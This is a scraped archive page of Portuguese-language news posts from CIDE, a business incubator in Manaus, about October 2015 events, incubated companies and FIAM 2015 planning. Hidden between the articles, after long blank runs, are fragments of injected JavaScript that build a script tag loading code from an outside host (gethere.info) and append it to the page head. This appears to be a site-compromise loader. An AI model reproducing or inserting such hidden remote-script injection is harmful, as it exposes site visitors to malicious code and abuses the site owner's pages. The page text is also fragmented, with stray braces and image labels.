• 92 3216-3892
  • secretaria@cide.org.br

Arquivos por mêsoutubro 2015

Empreendedores expõem na Semana Nacional de Ciência e Tecnologia

 

Empresários do CIDE e outras incubadoras de empresas expõem seus produtos

Empresários do CIDE e outras incubadoras de empresas expõem seus produtos

 

 

Empresas de comércio de doces e molhos de pimenta, instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE), estiveram, nos dias 19, 20, 21, na Semana Nacional de Ciência e Tecnologia promovida pelo Serviço de Apoio às Micro e Pequenas Empresas (SEBRAE), realizada em um shopping localizado na zona Norte de Manaus.

O evento teve como finalidade oferecer cursos, palestras e exposições para micro e pequenas empresas da Região. “Você tem a oportunidade de expor seus produtos, conhecer novos clientes e empreendedores, fazer novos negócios e interagir com outras incubadoras de empresas”, disse o proprietário da Temperos da Amazônia, Marcos Agra.

Além do CIDE, outras incubadoras de empresas que fazem parte da Rede Amazônica de Instituições em Prol do Empreendedorismo e da Inovação (RAMI) participaram.

FC2

FC3

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Cide participa da 25ª Conferência Anprotec em Mato Grosso

Representantes do CIDE e outros participantes na conferência da Anprotec

Representantes do CIDE e outros participantes na conferência da Anprotec

 

Ao longo de cinco dias, de 19 a 23 de outubro, dois representantes do Centro de Incubação e Desenvolvimento Empresarial (CIDE), o diretor executivo, José Cunha Barbosa Grosso, e a diretora financeira da instituição, Rosália Padilha, vão participar do maior evento de empreendedorismo inovador da América Latina, em Cuiabá (MT), a 25ª Conferência Anprotec (Associação Nacional de Entidades Promotoras de Empreendimentos Inovadores).

Com o tema “Ambientes de inovação mais sustentáveis: o empreendedor como protagonista da nova economia”, a programação do evento está distribuída entre workshops, minicursos, sessões plenárias, sessões interativas e fóruns. O evento é realizado pela própria Anprotec e Sebrae, com organização local da Arca Multincubadora, da Universidade Federal de Mato Grosso e do Governo do Estado de Mato Grosso.

 

TEMÁTICA

 

A Conferência deste ano propõe a discussão sobre inovações que ofereçam à sociedade não apenas benefícios econômicos e produtivos, mas também ambientais e sociais. Segundo a presidente da Anprotec, Francilene Garcia, o movimento de incubadoras de empresas e parques tecnológicos na promoção de um desenvolvimento sustentável vem experimentando novas alternativas. “Essas alternativas caminham para a interiorização, apoiando o desenvolvimento de segmentos vocacionados a dinamizar as economias locais e regionais. Transformar os ambientes de inovação, como incubadoras de empresas e parques tecnológicos, em plataformas de desenvolvimento sustentável e de mudança social consolida-se como uma importante bandeira da Anprotec para os tempos atuais e para o futuro”, explica.

 

 

Confe3

 

O diretor executivo do CIDE, José Barbosa Grosso, participa da 25º Conferência Anprotec

O diretor executivo do CIDE, José Barbosa Grosso, participa da 25º Conferência Anprotec

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Comida congelada: oportunidades de negócios no dia a dia da refeição

Os proprietários da "Trembão", Danielen Cestari e Gustavo Godoy.

Os proprietários da “Trembão”, Danielen Cestari e Gustavo Godoy.

 

 

Alimentação adequada, balanceada, saudável e prática para quem tem pouco tempo para estar ao fogão, e deseja emagrecer, pagando um preço razoável por um produto sem conservantes, virou realidade em Manaus.

A empresa de alimentos “Trembão” decidiu atender uma demanda que vem crescendo na cidade, a busca por refeições prontas e semiprontas, de fácil preparo, em embalagens de fácil abertura e fechamento, e descarte.

De acordo com os sócios da empresa, Danielen Cestari e Gustavo Godoy, a ideia de vender comida congelada ligth surgiu de uma necessidade particular. “Eu sofria de uma gastrite e não podia comer qualquer coisa e, além do mais, não podia tomar medicamentos porque tenho intolerância aos remédios e a médica me aconselhou corrigir a minha alimentação”, conta Danielen.

Diante do problema de conseguir uma alimentação adequada, Danielen procurou o cozinheiro, formado em Gastronomia, Gustavo Godoy, que tinha trabalhado em cozinhas do setor hoteleiro. “Primeiramente, ele falou que não podia me atender porque andava muito ocupado com suas atividades. Então, eu comecei a preparar minha própria comida e levá-la para o trabalho. Eu não tinha mais tempo para nada”, lembra Cestari, dizendo também, que tentou comprar alimentos lights congelados de São Paulo, o que não funcionou devido aos custos altos.

Mas a saída de Gustavo Godoy da cozinha em que ele trabalhava ia colocar tempero na ideia de montar o próprio negócio de comidas congeladas. “O Gustavo começou a fazer a comida e a vendia em embalagens a vácuo para amigos e conhecidos que se sentiam bem com aqueles alimentos. Inclusive emagreciam. Então, batizamos o produto de ‘Kit emagrecedor’”, relata Danielen Cestari, acrescentando que a divulgação do produto foi feita de boca em boca. “Minha sogra viu, provou e começou a pedir. A mesma coisa aconteceu com a minha tia, as amigas dela, enfim, começou a surgir uma série de demandas e vimos a oportunidade de montar um negócio”, diz ela.

Sem experiência em gestão de empresas, os sócios pediram ajuda a amigos que, prontamente, atenderam. “Eu sou advogada e não tinha experiência em administração, mas estávamos decididos a empreender. Então realizamos pesquisas sobre o mercado de comidas congeladas em Manaus e fomos procurar um local para montar a cozinha”.

 

O “Trembão” passa pelo CIDE

Juntos, o mineiro e cozinheiro Gustavo Godoy, formado em Gastronomia e especialista em Segurança Alimentar e a advogada Danielen Cestari procuraram um local, no qual pudessem instalar a empresa. “Procuramos muitos lugares, mas não correspondiam às nossas exigências. Sempre havia um problema. Mas o meu noivo, que conhecia o CIDE, me falou do centro de incubação e viemos conversar com o diretor executivo da instituição e, com a ajuda de um amigo, começamos os trâmites exigidos pela incubadora”, conta.

De acordo com diretor executivo do CIDE, José Barbosa Grosso, o negócio dos alimentos congelados é amplo e deve agradar o perfil da demanda local. “O projeto da empresa “Trembão” é inovador porque eles vão trabalhar com alimentos regionais também, além dos tipos de comida que já conhecemos. Espero que eles tenham sucesso e contribuam com a boa alimentação de um público que procura comidas saudáveis”, finaliza o diretor.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

}

Representantes de incubadoras e SEBRAE se preparam à FIAM 2015

O diretor executivo do CIDE, José Barbosa Grosso, e os representantes de outras incubadoras e do SEBRAE.

O diretor executivo do CIDE, José Barbosa Grosso, e os representantes de outras incubadoras e do SEBRAE.

 

 

No mês de agosto, o Centro de Incubação e Desenvolvimento Empresarial (CIDE), foi sede da reunião da Rede Amazônica de Instituições em Prol do Empreendedorismo e da Inovação (RAMI), que contou com a presença de representantes e administradores de incubadoras de empresas e do Serviço Brasileiro de Apoio às Micro e Pequenas Empresas (SEBRAE).

O encontro serviu para tratar da participação das empresas incubadas no espaço de comercialização do SEBRAE e rodadas de negócios na próxima Feira Internacional da Amazônia (VIII FIAM 2015), que está prevista para ser realizada entre os dias 18 a 21 de novembro, em Manaus. O tradicional evento é realizado pela SUFRAMA, com apoio do Ministério do Desenvolvimento, Indústria e Comércio Exterior (MDIC).

De acordo com a diretora financeira da RAMI, Rosália Padilha, foi oferecido aos centros de incubação do Norte, espaços e oportunidades para as empresas incubadas participarem de eventos durante a VIII FIAM 2015. “Nos próximos meses, vamos trabalhar para identificar quais empresas estão aptas para participar do evento e que assumam o compromisso de não deixar desocupado o espaço que será concedido”, disse.

Na ocasião, os representantes definiram as funções de cada membro da RAMI. “Além do Amazonas, outros centros de incubação de seis estados da Região Norte foram convidados a participar da rede de empreendedorismo”, disse a presidente Jane Moura.

RAMI 2

 

 

 

 

 

 

 

 

 

 

 

 

d.getElementsByTagName(‘head’)[0].appendChild(s);